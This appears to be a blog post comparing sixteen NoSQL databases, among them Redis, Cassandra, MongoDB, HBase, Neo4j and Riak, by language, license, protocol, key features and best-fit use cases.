In this light, here is a comparison of Cassandra, Mongodb, CouchDB, Redis, Riak, Couchbase (ex-Membase), Hypertable, ElasticSearch, Accumulo, VoltDB, Kyoto Tycoon, Scalaris, OrientDB, Aerospike, Neo4j and HBase:

The most popular ones

Redis (V2.8)

  • Written in: C
  • Main point: Blazing fast
  • License: BSD
  • Protocol: Telnet-like, binary safe
  • Disk-backed in-memory database,
  • Dataset size limited to computer RAM (but can span multiple machines’ RAM with clustering)
  • Master-slave replication, automatic failover
  • Simple values or data structures by keys
  • but complex operations like ZREVRANGEBYSCORE.
  • INCR & co (good for rate limiting or statistics)
  • Bit operations (for example to implement bloom filters)
  • Has sets (also union/diff/inter)
  • Has lists (also a queue; blocking pop)
  • Has hashes (objects of multiple fields)
  • Sorted sets (high score table, good for range queries)
  • Lua scripting capabilities (!)
  • Has transactions (!)
  • Values can be set to expire (as in a cache)
  • Pub/Sub lets one implement messaging

Best used: For rapidly changing data with a foreseeable database size (should fit mostly in memory).
For example: To store real-time stock prices. Real-time analytics. Leaderboards. Real-time communication. And wherever you used memcached before.

Cassandra (2.0)

  • Written in: Java
  • Main point: Store huge datasets in “almost” SQL
  • License: Apache
  • Protocol: CQL3 & Thrift
  • CQL3 is very similar SQL, but with some limitations that come from the scalability (most notably: no JOINs, no aggregate functions.)
  • CQL3 is now the official interface. Don’t look at Thrift, unless you’re working on a legacy app. This way, you can live without understanding ColumnFamilies, SuperColumns, etc.
  • Querying by key, or key range (secondary indices are also available)
  • Tunable trade-offs for distribution and replication (N, R, W)
  • Data can have expiration (set on INSERT).
  • Writes can be much faster than reads (when reads are disk-bound)
  • Map/reduce possible with Apache Hadoop
  • All nodes are similar, as opposed to Hadoop/HBase
  • Very good and reliable cross-datacenter replication
  • Distributed counter datatype.
  • You can write triggers in Java.

Best used: When you need to store data so huge that it doesn’t fit on server, but still want a friendly familiar interface to it.
For example: Web analytics, to count hits by hour, by browser, by IP, etc. Transaction logging. Data collection from huge sensor arrays.

MongoDB (2.2)

  • Written in: C++
  • Main point: Retains some friendly properties of SQL. (Query, index)
  • License: AGPL (Drivers: Apache)
  • Protocol: Custom, binary (BSON)
  • Master/slave replication (auto failover with replica sets)
  • Sharding built-in
  • Queries are javascript expressions
  • Run arbitrary javascript functions server-side
  • Better update-in-place than CouchDB
  • Uses memory mapped files for data storage
  • Performance over features
  • Journaling (with –journal) is best turned on
  • On 32bit systems, limited to ~2.5Gb
  • An empty database takes up 192Mb
  • GridFS to store big data + metadata (not actually an FS)
  • Has geospatial indexing
  • Data center aware

Best used: If you need dynamic queries. If you prefer to define indexes, not map/reduce functions. If you need good performance on a big DB. If you wanted CouchDB, but your data changes too much, filling up disks.
For example: For most things that you would do with MySQL or PostgreSQL, but having predefined columns really holds you back.

ElasticSearch (0.20.1)

  • Written in: Java
  • Main point: Advanced Search
  • License: Apache
  • Protocol: JSON over HTTP (Plugins: Thrift, memcached)
  • Stores JSON documents
  • Has versioning
  • Parent and children documents
  • Documents can time out
  • Very versatile and sophisticated querying, scriptable
  • Write consistency: one, quorum or all
  • Sorting by score (!)
  • Geo distance sorting
  • Fuzzy searches (approximate date, etc) (!)
  • Asynchronous replication
  • Atomic, scripted updates (good for counters, etc)
  • Can maintain automatic “stats groups” (good for debugging)
  • Still depends very much on only one developer (kimchy).

Best used: When you have objects with (flexible) fields, and you need “advanced search” functionality.
For example: A dating service that handles age difference, geographic location, tastes and dislikes, etc. Or a leaderboard system that depends on many variables.

Classic document and BigTable stores

CouchDB (V1.2)

  • Written in: Erlang
  • Main point: DB consistency, ease of use
  • License: Apache
  • Protocol: HTTP/REST
  • Bi-directional (!) replication,
  • continuous or ad-hoc,
  • with conflict detection,
  • thus, master-master replication. (!)
  • MVCC – write operations do not block reads
  • Previous versions of documents are available
  • Crash-only (reliable) design
  • Needs compacting from time to time
  • Views: embedded map/reduce
  • Formatting views: lists & shows
  • Server-side document validation possible
  • Authentication possible
  • Real-time updates via ‘_changes’ (!)
  • Attachment handling
  • thus, CouchApps (standalone js apps)

Best used: For accumulating, occasionally changing data, on which pre-defined queries are to be run. Places where versioning is important.
For example: CRM, CMS systems. Master-master replication is an especially interestin
g feature, allowing easy multi-site deployments.

Accumulo (1.4)

  • Written in: Java and C++
  • Main point: A BigTable with Cell-level security
  • License: Apache
  • Protocol: Thrift
  • Another BigTable clone, also runs of top of Hadoop
  • Originally from the NSA
  • Cell-level security
  • Bigger rows than memory are allowed
  • Keeps a memory map outside Java, in C++ STL
  • Map/reduce using Hadoop’s facitlities (ZooKeeper & co)
  • Some server-side programming

Best used: If you need to restict access on the cell level.
For example: Same as HBase, since it’s basically a replacement: Search engines. Analysing log data. Any place where scanning huge, two-dimensional join-less tables are a requirement.

HBase (V0.92.0)

  • Written in: Java
  • Main point: Billions of rows X millions of columns
  • License: Apache
  • Protocol: HTTP/REST (also Thrift)
  • Modeled after Google’s BigTable
  • Uses Hadoop’s HDFS as storage
  • Map/reduce with Hadoop
  • Query predicate push down via server side scan and get filters
  • Optimizations for real time queries
  • A high performance Thrift gateway
  • HTTP supports XML, Protobuf, and binary
  • Jruby-based (JIRB) shell
  • Rolling restart for configuration changes and minor upgrades
  • Random access performance is like MySQL
  • A cluster consists of several different types of nodes

Best used: Hadoop is probably still the best way to run Map/Reduce jobs on huge datasets. Best if you use the Hadoop/HDFS stack already.
For example: Search engines. Analysing log data. Any place where scanning huge, two-dimensional join-less tables are a requirement.

Hypertable (0.9.6.5)

  • Written in: C++
  • Main point: A faster, smaller HBase
  • License: GPL 2.0
  • Protocol: Thrift, C++ library, or HQL shell
  • Implements Google’s BigTable design
  • Run on Hadoop’s HDFS
  • Uses its own, “SQL-like” language, HQL
  • Can search by key, by cell, or for values in column families.
  • Search can be limited to key/column ranges.
  • Sponsored by Baidu
  • Retains the last N historical values
  • Tables are in namespaces
  • Map/reduce with Hadoop

Best used: If you need a better HBase.
For example: Same as HBase, since it’s basically a replacement: Search engines. Analysing log data. Any place where scanning huge, two-dimensional join-less tables are a requirement.

Graph databases

Neo4j (V1.5M02)

  • Written in: Java
  • Main point: Graph database – connected data
  • License: GPL, some features AGPL/commercial
  • Protocol: HTTP/REST (or embedding in Java)
  • Standalone, or embeddable into Java applications
  • Full ACID conformity (including durable data)
  • Both nodes and relationships can have metadata
  • Integrated pattern-matching-based query language (“Cypher”)
  • Also the “Gremlin” graph traversal language can be used
  • Indexing of nodes and relationships
  • Nice self-contained web admin
  • Advanced path-finding with multiple algorithms
  • Indexing of keys and relationships
  • Optimized for reads
  • Has transactions (in the Java API)
  • Scriptable in Groovy
  • Clustering, caching, online backup, advanced monitoring and High Availability is AGPL/commercial licensed

Best used: For graph-style, rich or complex, interconnected data.
For example: For searching routes in social relations, public transport links, road maps, or network topologies.

OrientDB (2.0)

  • Written in: Java
  • Main point: Document-based graph database
  • License: Apache 2.0
  • Protocol: Java API, binary or HTTP REST/JSON
  • Has transactions
  • Can be used both as a document and as a graph database (vertices with properties)
  • Multi-master architecture
  • Supports relationships between documents via persistent pointers (LINK, LINKSET, LINKMAP, LINKLIST field types)
  • SQL-like query language (Note: no JOIN, but there are pointers)
  • Web-based GUI (quite good-looking)
  • Inheritance between classes
  • User functions in SQL or JavaScript
  • Sharding
  • Advanced monitoring, online backups are commercially licensed

Best used: For graph-style, rich or complex, interconnected data.
For example: For searching routes in social relations, public transport links, road maps, or network topologies.

The “long tail”
(Not widely known, but definitely worthy ones)

Couchbase (ex-Membase) (2.0)

  • Written in: Erlang & C
  • Main point: Memcache compatible, but with persistence and clustering
  • License: Apache
  • Protocol: memcached + extensions
  • Very fast (200k+/sec) access of data by key
  • Persistence to disk
  • All nodes are identical (master-master replication)
  • Provides memcached-style in-memory caching buckets, too
  • Write de-duplication to reduce IO
  • Friendly cluster-management web GUI
  • Connection proxy for connection pooling and multiplexing (Moxi)
  • Incremental map/reduce
  • Cross-datacenter replication

Best used: Any application where low-latency data access, high concurrency support and high availability is a requirement.
For example: Low-latency use-cases like ad targeting or highly-concurrent web apps like online gaming (e.g. Zynga).

Scalaris (0.5)

  • Written in: Erlang
  • Main point: Distributed P2P key-value store
  • License: Apache
  • Protocol: Proprietary & JSON-RPC
  • In-memory (disk when using Tokyo Cabinet as a backend)
  • Uses YAWS as a web server
  • Has transactions (an adapted Paxos commit)
  • Consistent, distributed write operations
  • From CAP, values Consistency over Availability (in case of network partitioning, only the bigger partition works)

Best used: If you like Erlang and wanted to use Mnesia or DETS or ETS, but you need something that is accessible from more languages (and scales much better than ETS or DETS).
For example: In an Erlang-based system when you want to give access to the DB to Python, Ruby or Java programmers.

Aerospike (3.3)

  • Written in: C
  • Main point: Speed, SSD-optimized storage
  • License: License: AGPL (Client: Apache)
  • Protocol: Proprietary
  • Cross-datacenter replication is commercially licensed
  • Very fast access of data by key
  • Uses SSD devices as a block device to store data (RAM + persistence also available)
  • Automatic failover and automatic rebalancing of data when nodes or added or removed from cluster
  • User Defined Functions in LUA
  • Cluster management with Web GUI
  • Has complex data types (lists and maps) as well as simple (integer, string, blob)
  • Secondary indices
  • Aggregation query model
  • Data can be set to expire
    with a time-to-live (TTL)

Best used: Any application where low-latency data access, high concurrency support and high availability is a requirement.
For example:Storing massive amounts of profile data in online advertising or retail Web sites.

Riak (V1.2)

  • Written in: Erlang & C, some JavaScript
  • Main point: Fault tolerance
  • License: Apache
  • Protocol: HTTP/REST or custom binary
  • Stores blobs
  • Tunable trade-offs for distribution and replication
  • Pre- and post-commit hooks in JavaScript or Erlang, for validation and security.
  • Map/reduce in JavaScript or Erlang
  • Links & link walking: use it as a graph database
  • Secondary indices: but only one at once
  • Large object support (Luwak)
  • Comes in “open source” and “enterprise” editions
  • Full-text search, indexing, querying with Riak Search
  • In the process of migrating the storing backend from “Bitcask” to Google’s “LevelDB”
  • Masterless multi-site replication replication and SNMP monitoring are commercially licensed

Best used: If you want something Dynamo-like data storage, but no way you’re gonna deal with the bloat and complexity. If you need very good single-site scalability, availability and fault-tolerance, but you’re ready to pay for multi-site replication.
For example: Point-of-sales data collection. Factory control systems. Places where even seconds of downtime hurt. Could be used as a well-update-able web server.

VoltDB (2.8.4.1)

  • Written in: Java
  • Main point: Fast transactions and rapidly changing data
  • License: GPL 3
  • Protocol: Proprietary
  • In-memory relational database.
  • Can export data into Hadoop
  • Supports ANSI SQL
  • Stored procedures in Java
  • Cross-datacenter replication

Best used: Where you need to act fast on massive amounts of incoming data.
For example: Point-of-sales data analysis. Factory control systems.

Kyoto Tycoon (0.9.56)

  • Written in: C++
  • Main point: A lightweight network DBM
  • License: GPL
  • Protocol: HTTP (TSV-RPC or REST)
  • Based on Kyoto Cabinet, Tokyo Cabinet’s successor
  • Multitudes of storage backends: Hash, Tree, Dir, etc (everything from Kyoto Cabinet)
  • Kyoto Cabinet can do 1M+ insert/select operations per sec (but Tycoon does less because of overhead)
  • Lua on the server side
  • Language bindings for C, Java, Python, Ruby, Perl, Lua, etc
  • Uses the “visitor” pattern
  • Hot backup, asynchronous replication
  • background snapshot of in-memory databases
  • Auto expiration (can be used as a cache server)

Best used: When you want to choose the backend storage algorithm engine very precisely. When speed is of the essence.
For example: Caching server. Stock prices. Analytics. Real-time data collection. Real-time communication. And wherever you used memcached before.

Of course, all these systems have much more features than what’s listed here. I only wanted to list the key points that I base my decisions on. Also, development of all are very fast, so things are bound to change.
Discussion on Hacker News